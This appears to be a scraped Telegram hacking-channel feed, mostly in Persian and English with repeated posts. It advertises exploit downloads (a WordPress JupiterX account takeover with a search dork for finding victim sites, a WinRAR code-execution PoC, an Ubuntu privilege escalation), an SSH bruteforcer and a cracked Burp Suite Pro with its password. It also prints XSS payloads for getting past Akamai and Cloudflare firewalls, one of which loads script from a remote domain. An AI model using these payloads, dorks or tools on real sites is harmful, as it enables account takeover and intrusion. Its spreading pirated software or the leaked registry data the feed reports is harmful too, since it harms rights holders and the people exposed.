CVE-2023-38389-@LearnExploit.rar
726.6 KB
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
نکته: با پایتون 2.7 اجرا کنید در غیر این صورت با اررور مواجه میشید.Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
CVE-2023-38831
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-32233
Ubuntu 23.04 LPE exploit
Github
#exploit #linux #cve #LPE
——————
0Day.Today
@LearnExploit
@Tech_Army
Ubuntu 23.04 LPE exploit
Github
#exploit #linux #cve #LPE
——————
0Day.Today
@LearnExploit
@Tech_Army
burpsuite_pro_v2023.10.1.zip
642.7 MB
Burp Suite Version 2023.10.1
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت . *
Pass : 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت . *
Pass : 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
An Akamai WAF bypass
kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
A payload to bypass some WAF
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Secure Shell Bruteforcer — A faster & simpler way to bruteforce SSH server
Github
#SSH #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#SSH #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
در نسخه بتای تلگرام اگر شخصی با دستگاهی دیگر در اکانت شما لاگین کند، تلگرام با نمایش نوتیفیکیشن درون برنامهای به کاربر هشدار میدهد و کاربر میتواند از طریق همین نوتیفیکیشن، اجازه دسترسی جدید را مسدود کند.
#News #Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
#News #Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
آیس کیوب که کونه این حرفا نمیزاره معمولا، اینجوری جواب ایلان ماسک و داده 😂🤦♂
#fun
——————
0Day.Today
@LearnExploit
@Tech_Army
#fun
——————
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
Telegram: get the IP address of the interlocutor
Learn
#Telegram #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Learn
#Telegram #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
CloudFlare Bypass [XSS]
Payload :
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
#Course #Free #OWASP #Web_Hacking
🔱 دوره رایگان OWASP
⚜️
HTTP (Part01) :
https://cafenode.ir/OWASP-FREE/01/c01.mp4
https://cafenode.ir/OWASP-FREE/01/c02.mp4
https://cafenode.ir/OWASP-FREE/01/c03.mp4
https://cafenode.ir/OWASP-FREE/01/c04.mp4
OS Command Injection (Part02):
https://cafenode.ir/OWASP-FREE/02/c01.mp4
https://cafenode.ir/OWASP-FREE/02/c02.mp4
https://cafenode.ir/OWASP-FREE/02/c03.mp4
https://cafenode.ir/OWASP-FREE/02/c04.mp4
https://cafenode.ir/OWASP-FREE/02/c05.mp4
https://cafenode.ir/OWASP-FREE/02/c06.mp4
Server Side Template Injection (Part03):
https://cafenode.ir/OWASP-FREE/03/c01.mp4
https://cafenode.ir/OWASP-FREE/03/c02.mp4
https://cafenode.ir/OWASP-FREE/03/c03.mp4
https://cafenode.ir/OWASP-FREE/03/c04.mp4
XSS - CSRF (Part04):
https://cafenode.ir/OWASP-FREE/04/c01.mp4
https://cafenode.ir/OWASP-FREE/04/c02.mp4
https://cafenode.ir/OWASP-FREE/04/c03.mp4
https://cafenode.ir/OWASP-FREE/04/c04.mp4
Live (Part05):
https://cafenode.ir/OWASP-FREE/05/c01.mp4
https://cafenode.ir/OWASP-FREE/05/c02.mp4
Server Side Request Forgery (Part06):
https://cafenode.ir/OWASP-FREE/06/c01.mp4
https://cafenode.ir/OWASP-FREE/06/c02.mp4
https://cafenode.ir/OWASP-FREE/06/c03.mp4
https://cafenode.ir/OWASP-FREE/06/c04.mp4
https://cafenode.ir/OWASP-FREE/06/c05.mp4
https://cafenode.ir/OWASP-FREE/06/c06.mp4
SQL Injection I (Part07) :
https://cafenode.ir/OWASP-FREE/07/c01.mp4
https://cafenode.ir/OWASP-FREE/07/c02.mp4
https://cafenode.ir/OWASP-FREE/07/c03.mp4
https://cafenode.ir/OWASP-FREE/07/c04.mp4
https://cafenode.ir/OWASP-FREE/07/c05.mp4
https://cafenode.ir/OWASP-FREE/07/c06.mp4
https://cafenode.ir/OWASP-FREE/07/c07.mp4
https://cafenode.ir/OWASP-FREE/07/c08.mp4
SQL Injection II (Part08) :
https://cafenode.ir/OWASP-FREE/08/c01.mp4
https://cafenode.ir/OWASP-FREE/08/c02.mp4
https://cafenode.ir/OWASP-FREE/08/c03.mp4
https://cafenode.ir/OWASP-FREE/08/c04.mp4
https://cafenode.ir/OWASP-FREE/08/c05.mp4
https://cafenode.ir/OWASP-FREE/08/c06.mp4
https://cafenode.ir/OWASP-FREE/08/c07.mp4
XML External Entity (Part09) :
https://cafenode.ir/OWASP-FREE/09/c01.mp4
https://cafenode.ir/OWASP-FREE/09/c02.mp4
https://cafenode.ir/OWASP-FREE/09/c03.mp4
https://cafenode.ir/OWASP-FREE/09/c04.mp4
https://cafenode.ir/OWASP-FREE/09/c05.mp4
https://cafenode.ir/OWASP-FREE/09/c06.mp4
https://cafenode.ir/OWASP-FREE/09/c07.mp4
https://cafenode.ir/OWASP-FREE/09/c08.mp4
https://cafenode.ir/OWASP-FREE/09/c09.mp4
https://cafenode.ir/OWASP-FREE/09/c10.mp4
Broken Authentication (Part10) :
https://cafenode.ir/OWASP-FREE/10/c01.mp4
https://cafenode.ir/OWASP-FREE/10/c02.mp4
https://cafenode.ir/OWASP-FREE/10/c03.mp4
https://cafenode.ir/OWASP-FREE/10/c04.mp4
https://cafenode.ir/OWASP-FREE/10/c05.mp4
API Security (Part11) :
https://cafenode.ir/OWASP-FREE/11/c01.mp4
https://cafenode.ir/OWASP-FREE/11/c02.mp4
https://cafenode.ir/OWASP-FREE/11/c03.mp4
https://cafenode.ir/OWASP-FREE/11/c04.mp4
https://cafenode.ir/OWASP-FREE/11/c05.mp4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
🔱 دوره رایگان OWASP
⚜️
مدرس : میثم منصف
HTTP (Part01) :
https://cafenode.ir/OWASP-FREE/01/c01.mp4
https://cafenode.ir/OWASP-FREE/01/c02.mp4
https://cafenode.ir/OWASP-FREE/01/c03.mp4
https://cafenode.ir/OWASP-FREE/01/c04.mp4
OS Command Injection (Part02):
https://cafenode.ir/OWASP-FREE/02/c01.mp4
https://cafenode.ir/OWASP-FREE/02/c02.mp4
https://cafenode.ir/OWASP-FREE/02/c03.mp4
https://cafenode.ir/OWASP-FREE/02/c04.mp4
https://cafenode.ir/OWASP-FREE/02/c05.mp4
https://cafenode.ir/OWASP-FREE/02/c06.mp4
Server Side Template Injection (Part03):
https://cafenode.ir/OWASP-FREE/03/c01.mp4
https://cafenode.ir/OWASP-FREE/03/c02.mp4
https://cafenode.ir/OWASP-FREE/03/c03.mp4
https://cafenode.ir/OWASP-FREE/03/c04.mp4
XSS - CSRF (Part04):
https://cafenode.ir/OWASP-FREE/04/c01.mp4
https://cafenode.ir/OWASP-FREE/04/c02.mp4
https://cafenode.ir/OWASP-FREE/04/c03.mp4
https://cafenode.ir/OWASP-FREE/04/c04.mp4
Live (Part05):
https://cafenode.ir/OWASP-FREE/05/c01.mp4
https://cafenode.ir/OWASP-FREE/05/c02.mp4
Server Side Request Forgery (Part06):
https://cafenode.ir/OWASP-FREE/06/c01.mp4
https://cafenode.ir/OWASP-FREE/06/c02.mp4
https://cafenode.ir/OWASP-FREE/06/c03.mp4
https://cafenode.ir/OWASP-FREE/06/c04.mp4
https://cafenode.ir/OWASP-FREE/06/c05.mp4
https://cafenode.ir/OWASP-FREE/06/c06.mp4
SQL Injection I (Part07) :
https://cafenode.ir/OWASP-FREE/07/c01.mp4
https://cafenode.ir/OWASP-FREE/07/c02.mp4
https://cafenode.ir/OWASP-FREE/07/c03.mp4
https://cafenode.ir/OWASP-FREE/07/c04.mp4
https://cafenode.ir/OWASP-FREE/07/c05.mp4
https://cafenode.ir/OWASP-FREE/07/c06.mp4
https://cafenode.ir/OWASP-FREE/07/c07.mp4
https://cafenode.ir/OWASP-FREE/07/c08.mp4
SQL Injection II (Part08) :
https://cafenode.ir/OWASP-FREE/08/c01.mp4
https://cafenode.ir/OWASP-FREE/08/c02.mp4
https://cafenode.ir/OWASP-FREE/08/c03.mp4
https://cafenode.ir/OWASP-FREE/08/c04.mp4
https://cafenode.ir/OWASP-FREE/08/c05.mp4
https://cafenode.ir/OWASP-FREE/08/c06.mp4
https://cafenode.ir/OWASP-FREE/08/c07.mp4
XML External Entity (Part09) :
https://cafenode.ir/OWASP-FREE/09/c01.mp4
https://cafenode.ir/OWASP-FREE/09/c02.mp4
https://cafenode.ir/OWASP-FREE/09/c03.mp4
https://cafenode.ir/OWASP-FREE/09/c04.mp4
https://cafenode.ir/OWASP-FREE/09/c05.mp4
https://cafenode.ir/OWASP-FREE/09/c06.mp4
https://cafenode.ir/OWASP-FREE/09/c07.mp4
https://cafenode.ir/OWASP-FREE/09/c08.mp4
https://cafenode.ir/OWASP-FREE/09/c09.mp4
https://cafenode.ir/OWASP-FREE/09/c10.mp4
Broken Authentication (Part10) :
https://cafenode.ir/OWASP-FREE/10/c01.mp4
https://cafenode.ir/OWASP-FREE/10/c02.mp4
https://cafenode.ir/OWASP-FREE/10/c03.mp4
https://cafenode.ir/OWASP-FREE/10/c04.mp4
https://cafenode.ir/OWASP-FREE/10/c05.mp4
API Security (Part11) :
https://cafenode.ir/OWASP-FREE/11/c01.mp4
https://cafenode.ir/OWASP-FREE/11/c02.mp4
https://cafenode.ir/OWASP-FREE/11/c03.mp4
https://cafenode.ir/OWASP-FREE/11/c04.mp4
https://cafenode.ir/OWASP-FREE/11/c05.mp4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
گروه Anti-mullah سازمان ثبت احوال رو هک کرده و به اطلاعات بیش از ۱۳۰ میلیون نفر دسترسی پیدا کرده .
ثبت احوال این موضوع رو تکذیب کرده.
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
ثبت احوال این موضوع رو تکذیب کرده.
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
گروه antimullah که چندی پیش ثبت احوال رو مورد نفوذ قرار داده بود ، نمونه ای 1000 تایی منتشر کردن که شامل :
نام و نان خانوادگی ، کدملی
ایمیل، شماره موبایل و غیره میشه .
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
نام و نان خانوادگی ، کدملی
ایمیل، شماره موبایل و غیره میشه .
#News
——————
0Day.Today
@LearnExploit
@Tech_Army